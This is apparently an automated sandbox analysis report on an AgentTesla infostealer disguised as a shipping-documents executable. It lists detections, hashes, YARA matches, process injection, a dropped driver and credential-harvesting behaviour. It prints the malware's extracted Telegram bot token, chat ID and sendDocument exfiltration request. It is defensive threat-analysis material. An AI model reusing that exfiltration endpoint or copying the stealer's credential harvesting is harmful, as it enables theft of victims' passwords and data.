Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Sample Name: BL-SHIPPING DOCUMENTS.exe
Analysis ID: 756203
MD5: 69fe54a9cafee09f25e0d3f7a51488c7
SHA1: 747373a2640c7fca04258681c7ec313be3b0db24
SHA256: dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
Tags: agentteslaexe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Spawns drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

barindex
Source: BL-SHIPPING DOCUMENTS.exe ReversingLabs: Detection: 22%
Source: BL-SHIPPING DOCUMENTS.exe Virustotal: Detection: 26% Perma Link
Source: BL-SHIPPING DOCUMENTS.exe Joe Sandbox ML: detected
Source: 1.0.CasPol.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 1.0.CasPol.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
Source: CasPol.exe.5312.1.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb source: BL-SHIPPING DOCUMENTS.exe
Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr

Networking

barindex
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://TcwLAp.com
Source: CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000001.00000002.829202853.000000000634E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://FZsMKmQQms.net
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4
Source: ?????.sys.0.dr String found in binary or memory: https://www.sysinternals.com0
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown HTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

barindex
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: initial sample Static PE information: Filename: BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe, u0036WPvYiAf4rXCUiIeqR/yw3NM9q.cs Large array initialization: get_hii: array initializer size 481808
Source: 1.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7B11A2CAu002d4195u002d4BA6u002d80B6u002d4DED58549CE3u007d/AB3968EDu002d5083u002d4DC4u002d8042u002dAEEF6AA978C6.cs Large array initialization: .cctor: array initializer size 10967
Source: BL-SHIPPING DOCUMENTS.exe Static file information: Suspicious name
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_013DF928 1_2_013DF928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_062276F0 1_2_062276F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0622CF70 1_2_0622CF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0622A4C0 1_2_0622A4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06225BC0 1_2_06225BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0622768E 1_2_0622768E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06225A70 1_2_06225A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0622F2E0 1_2_0622F2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06223330 1_2_06223330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0623BE8D 1_2_0623BE8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06239330 1_2_06239330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0623AF88 1_2_0623AF88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_062355A0 1_2_062355A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06237F80 1_2_06237F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06235148 1_2_06235148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06260040 1_2_06260040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06266BA8 1_2_06266BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06264940 1_2_06264940
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: No import functions for PE file found
Source: BL-SHIPPING DOCUMENTS.exe, 00000000.00000000.294039258.00000249F70DA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process token adjusted: Load Driver Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe File created: C:\Users\user\AppData\Local\Temp\?????.sys Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill Jump to behavior
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BL-SHIPPING DOCUMENTS.exe ReversingLabs: Detection: 22%
Source: BL-SHIPPING DOCUMENTS.exe Virustotal: Detection: 26%
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BL-SHIPPING DOCUMENTS.exe.log Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe File created: C:\Users\user\AppData\Local\Temp\?????.sys Jump to behavior
Source: ?????.sys.0.dr Binary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@1/1
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: BL-SHIPPING DOCUMENTS.exe, u0036WPvYiAf4rXCUiIeqR/yw3NM9q.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.0.CasPol.exe.400000.0.unpack, A/f2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.0.CasPol.exe.400000.0.unpack, A/f2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: BL-SHIPPING DOCUMENTS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb source: BL-SHIPPING DOCUMENTS.exe
Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_0622CF70 push es; iretd 1_2_0622EC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_062218AD push es; ret 1_2_06221910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_062218BE push es; ret 1_2_06221910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_062218C5 push es; ret 1_2_06221910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_062218CA push es; ret 1_2_06221910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06222177 push edi; retn 0000h 1_2_06222179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 1_2_06239283 push esp; ret 1_2_062392D1
Source: initial sample Static PE information: section name: .text entropy: 7.998151218559443

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe File created: C:\Users\user\AppData\Local\Temp\?????.sys Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe File created: C:\Users\user\AppData\Local\Temp\?????.sys Jump to dropped file
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKill Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
